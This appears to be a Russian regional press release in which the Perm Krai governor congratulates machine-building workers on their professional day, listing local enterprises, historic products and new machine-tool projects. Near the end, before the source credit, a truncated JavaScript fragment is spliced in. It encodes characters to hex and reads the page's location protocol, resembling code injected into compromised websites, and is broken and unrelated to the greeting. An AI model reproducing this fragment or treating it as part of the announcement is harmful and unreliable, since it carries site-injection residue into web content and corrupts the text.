Губернатор Виктор Басаргин поздравляет работников машиностроительного комплекса с профессиональным праздником

Уважаемые работники машиностроительного комплекса Прикамья! Дорогие ветераны отрасли!
От души поздравляю вас с Днем Машиностроителя! Машиностроение – основа промышленной мощи Прикамья. Сегодня это более 150 предприятий, здесь трудится 90 тысяч наших земляков. В Пермском крае активно реализуются проекты таких крупнейших машиностроительных корпораций России, как «Ростех», «Оборонпром», «Станкопром», «Росвертол» и других. Их интерес к нашему региону не случаен, ведь у машиностроительной отрасли края богатые традиции и серьезный потенциал. Помимо Перми, Краснокамск, Лысьва, Кунгур, Александровск, Очёр и другие города края были и остаются центрами машиностроения.
Многие достижения отрасли стали настоящими брендами региона, получили известность далеко за пределами страны. Царь-пушка и 50-тонный паровой Царь-молот, электрическая машина знаменитого изобретателя, нашего земляка Николая Славянова – славные страницы прошлого нашего машиностроения.
Авиационные двигатели, которыми оснащен Президентский борт №1, ракетно-космические двигатели, знаменитые артиллерийские установки – всё это поводы гордиться нашими инженерами и конструкторами сегодня.
От создателей авиадвигателей из технополиса «Новый Звездный» и оружейников Мотовилихи не отстают их коллеги из других промышленных кластеров Прикамья. В «Редуктор-ПМ» полным ходом строятся новые мощности для производства современных вертолетных редукторов и трансмиссий.
В этом году в Прикамье, дан старт созданию, по сути с нуля, целой отрасли — станкостроения. Не так давно мы подписали соглашение с холдингом «Станкопром» по производству новых станков на нашей территории. И вот результат — буквально на днях наш новый, суперсовременный станок «ПротонТ500» был представлен в Сочи, на форуме регионов России и Белоруссии.
Работа спорится, когда за нее берутся профессионалы, болеющие всей душой за своё дело. В прикамском машиностроении таких людей всегда было немало. Имена выдающихся машиностроителей Прикамья, увековеченные в названиях улиц наших городов – А.Д. Швецова, А.Г. Солдатова, А. А. Гатауллина, Н.Ф. Краснова, П.А. Соловьева, — известны почти каждому пермяку.
Сегодня вы, машиностроители Прикамья, продолжаете славные традиции, заложенные этими выдающимися людьми. Ваш профессионализм, опыт и трудолюбие позволили машиностроительной отрасли сохранить всё лучшее и подняться на новый уровень. Благодарю вас за энергию и самоотдачу. Уверен, что общими усилиями мы и дальше будем успешно решать самые амбициозные задачи по развитию машиностроения Прикамья и всей России!
// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

источник: perm.ru